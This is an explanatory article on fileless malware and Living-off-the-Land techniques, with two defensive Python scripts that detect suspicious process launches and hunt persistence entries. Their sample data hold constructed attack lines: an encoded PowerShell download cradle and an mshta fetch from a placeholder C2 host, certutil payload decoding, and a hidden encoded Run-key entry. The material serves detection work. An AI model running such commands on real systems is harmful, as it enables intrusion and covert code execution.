
Fileless Malware - Attacks That Leave No Files


Fileless malware is a collective term for malware that executes directly in memory without writing any files to disk. Traditional antivirus software detects threats by scanning files for signatures (known patterns); because fileless malware leaves no file to scan, it slips past this detection technique. Such attacks surged around 2017, and today many advanced targeted attacks incorporate fileless techniques.

The Living off the Land (LOL) Technique

At the heart of fileless malware lies a technique called "Living off the Land": the attacker abuses legitimate tools already built into the OS. Because those tools are in everyday use, security products find it hard to distinguish "normal administrative operations" from "attacks."

PowerShell: Executes scripts in memory. Commands are obfuscated with Base64 encoding, and payloads are downloaded from a C2 server and run.
WMI: Uses Windows Management Instrumentation to launch processes remotely and to achieve persistence through event subscriptions.
.NET / MSBuild: Abuses the inline task feature of .NET to compile and run C# code embedded inside an XML file.
mshta / certutil: Abused to execute HTA files and to reconstruct payloads using certutil's Base64 decoding feature.

The LOLBAS (Living Off The Land Binaries, Scripts and Libraries) project systematically catalogs standard Windows binaries that could be abused in attacks. Security teams reference this list to prioritize which processes to monitor.

Why Traditional Antivirus Cannot Detect It

Approach        Method               Result              Reason
Traditional AV  File scanning        Detection fails     No file exists to scan
EDR             Behavior monitoring  Detection succeeds  Detects abnormal API calls

Traditional antivirus works by matching files on disk against a signature database. Because fileless malware operates only in memory, there is nothing to scan. Furthermore, PowerShell and WMI are legitimate OS components, and blocking those processes outright would disrupt business operations. This "abuse of legitimate tools" is the fundamental reason fileless malware is so difficult to detect.

Behavior-Based Detection with EDR

EDR (Endpoint Detection and Response) monitors process behavior rather than the presence of files. It detects abnormal patterns such as PowerShell executing a Base64-encoded command, a suspicious process launching via WMI, or a process that normally never communicates connecting to an external IP, and it raises alerts. By adding machine-learning-based behavioral analysis, it can also handle previously unseen fileless attacks.
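The behavior rules described above (encoded PowerShell, WMI-spawned shells, mshta, certutil and MSBuild abuse from the Living off the Land list) can be expressed as checks over process-creation telemetry. The following script is an added example and is not code from the original article; the events are constructed to resemble Sysmon Event ID 1 fields, and the rule names, the placeholder C2 URL and the sample command lines are assumptions.

```python
"""Hypothetical behavior rules for Living-off-the-Land process activity.

Added example; not code from the original article. The events below are
constructed to resemble Sysmon Event ID 1 (process creation) fields, and the
rule names, thresholds and sample values are assumptions.
"""
import base64
import re

# Placeholder host used by the constructed samples; not a real C2 address.
C2_URL = "http://c2.example.invalid/stage1"

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so the detector must not look for the full switch name only.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Download-cradle vocabulary typically seen in the decoded script.
CRADLE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|frombase64string)\b"
)
# Script hosts that are suspicious when WmiPrvSE.exe (the WMI provider host) is the parent.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def encode_powershell(script: str) -> str:
    """Build what PowerShell expects after -EncodedCommand: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENC_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid Base64 / not UTF-16LE
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event: dict) -> list:
    """Apply every rule to one process-creation event; returns the matched rule names."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
        # Inspect the decoded script when there is one, otherwise the raw command line.
        if CRADLE.search(decoded if decoded is not None else cmd):
            hits.append("powershell_download_cradle")
    if parent == "wmiprvse.exe" and image in SHELLS:
        hits.append("wmi_spawned_shell")  # remote process launch through WMI
    if image == "mshta.exe" and re.search(r"(?i)https?://|\.hta\b", cmd):
        hits.append("mshta_remote_or_hta")
    if image == "certutil.exe" and re.search(r"(?i)-(?:decode|urlcache)\b", cmd):
        hits.append("certutil_decode_or_download")
    if image == "msbuild.exe" and re.search(r"(?i)\S+\.(?:xml|csproj|proj)\b", cmd):
        hits.append("msbuild_project_file")  # inline-task project handed to MSBuild
    return hits


def scan(events: list) -> dict:
    """Map the index of each event that matched at least one rule to its rule names."""
    results = {}
    for index, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[index] = hits
    return results


# Constructed sample telemetry (not captured from a real host).
STAGE1 = f"IEX (New-Object Net.WebClient).DownloadString('{C2_URL}')"
SAMPLE_EVENTS = [
    {   # encoded download cradle launched through WMI
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(STAGE1),
    },
    {   # certutil used as a Base64 decoder to rebuild a payload
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.dll",
    },
    {   # mshta fetching a remote HTA
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f"mshta.exe {C2_URL}/a.hta",
    },
    {   # MSBuild handed an XML project with an inline task
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"MSBuild.exe C:\Users\Public\build.xml",
    },
    {   # ordinary administrative PowerShell use: must not alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1",
    },
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS).items():
        print(index, SAMPLE_EVENTS[index]["CommandLine"][:60], hits)
```

The decoder matters more than the keyword list: an EDR rule that only looks for the string "-EncodedCommand" misses the short forms PowerShell also accepts, and a rule that never decodes the Base64 cannot tell a download cradle from a harmless encoded script. The last sample event shows the other half of the problem the article describes: a signed script run by an administrator must pass, because blocking PowerShell outright is not an option.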

Hiding in the Registry and Scheduled Tasks

Although fileless malware "writes no files," it may still use persistence mechanisms to survive reboots. Representative techniques include writing an encoded PowerShell command into the Run key of the Windows registry, or registering a malicious script as a scheduled task. Using WMI event subscriptions, code can be executed in memory when specific conditions are met (logon, time, and so on). Advanced techniques that pair these with a rootkit to hide the persistence entries themselves have also been confirmed.
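The three persistence locations named above (Run key values, scheduled task actions and permanent WMI event subscriptions) can be reviewed with the same yardstick: does the persisted command start a script host, with an encoded command, a hidden window or a payload under a user-writable path? The script below is an added example, not code from the original article; the Run-key values, the Task Scheduler XML and the WMI subscription records are constructed, and on a live host they would come from the registry, "schtasks /query /xml" exports and the root\subscription namespace respectively. The function names and the reason strings are assumptions.

```python
r"""Hypothetical hunt for fileless persistence entries.

Added example; not code from the original article. The Run-key values,
the Task Scheduler XML and the WMI subscription records are constructed;
on a live host they would come from the registry, "schtasks /query /xml"
exports and the root\subscription namespace respectively.
"""
import base64
import re
import xml.etree.ElementTree as ET

SCRIPT_HOSTS = {"powershell", "pwsh", "mshta", "wscript", "cscript", "cmd", "rundll32", "regsvr32"}
# Any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...) followed by Base64.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
USER_WRITABLE = re.compile(r"(?i)\\(?:temp|appdata|public)\\")
# Namespace of the Task Scheduler XML format.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def encode_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, the form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    match = ENC_ARG.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def judge_command(cmd: str) -> list:
    """Reasons a persisted command line looks like in-memory script tooling ([] = benign)."""
    first = re.match(r'\s*"?([^"\s]+)', cmd)  # first token is the executable
    name = re.sub(r"\.exe$", "", first.group(1).lower().rsplit("\\", 1)[-1]) if first else ""
    reasons = []
    if name in SCRIPT_HOSTS:
        reasons.append(f"script host {name}")
        if decode_encoded_command(cmd) is not None:
            reasons.append("encoded command")
        if HIDDEN.search(cmd):
            reasons.append("hidden window")
        if USER_WRITABLE.search(cmd):
            reasons.append("payload under user-writable path")
    return reasons


def task_command_lines(task_xml: str) -> list:
    """Extract 'command arguments' strings from every <Exec> action of a task definition."""
    root = ET.fromstring(task_xml)
    lines = []
    for action in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        lines.append(f"{command} {arguments}".strip())
    return lines


def hunt(run_key: dict, task_xml: str, wmi_subscriptions: list) -> list:
    """Return (location, name, reasons) for each persistence entry worth an analyst's look."""
    findings = []
    for name, cmd in run_key.items():
        if reasons := judge_command(cmd):
            findings.append(("Run key", name, reasons))
    for cmd in task_command_lines(task_xml):
        if reasons := judge_command(cmd):
            findings.append(("Scheduled task", cmd.split()[0], reasons))
    for sub in wmi_subscriptions:
        consumer = sub["Consumer"]
        # A permanent consumer that runs a command or script is rare on workstations.
        if consumer["__CLASS"] in ("CommandLineEventConsumer", "ActiveScriptEventConsumer"):
            reasons = ["permanent WMI event consumer"]
            reasons += judge_command(consumer.get("CommandLineTemplate", ""))
            findings.append(("WMI subscription", consumer["Name"], reasons))
    return findings


# Constructed inputs (not taken from a real host).
PAYLOAD = encode_powershell("# placeholder stage-2 script (constructed)")
RUN_KEY = {  # values as read from HKCU\...\CurrentVersion\Run
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WinUpdate": "powershell.exe -NoP -W Hidden -enc " + PAYLOAD,
}
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>mshta.exe</Command><Arguments>C:\Users\Public\update.hta</Arguments></Exec>
  </Actions>
</Task>"""
WMI_SUBSCRIPTIONS = [  # filter/consumer pairs as enumerated from root\subscription
    {"Filter": {"Name": "Updater",
                "Query": "SELECT * FROM __InstanceCreationEvent WITHIN 10 "
                         "WHERE TargetInstance ISA 'Win32_LogonSession'"},
     "Consumer": {"Name": "Updater", "__CLASS": "CommandLineEventConsumer",
                  "CommandLineTemplate": "powershell.exe -NoP -W Hidden -enc " + PAYLOAD}},
]

if __name__ == "__main__":
    for location, name, reasons in hunt(RUN_KEY, TASK_XML, WMI_SUBSCRIPTIONS):
        print(f"{location:16} {name:12} {', '.join(reasons)}")
```

The OneDrive entry sits under AppData too, but it is not a script host, so it produces no finding; the path check only adds weight once a script host is involved. Note that a permanent WMI consumer is reported even when its command line looks clean, because the article's point is that the trigger itself is the unusual artifact.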

The Importance of Memory Forensics

In investigating fileless malware, memory forensics is the decisive part of digital forensics. Because no traces remain on disk, you cannot grasp the full scope of an attack unless you capture and analyze a dump of RAM. With tools such as the Volatility Framework, you identify suspicious processes in memory, injected code, and network connection destinations.

Rebooting a device when an incident occurs erases all the evidence in memory, so the procedure "capture a memory dump first, then respond" must be firmly established as the initial step of incident response. Traces of lateral movement also often remain only in memory, so from the standpoint of ransomware protection as well, building out a memory forensics capability is required.

Browser extension security also warrants attention as an attack vector related to fileless techniques.
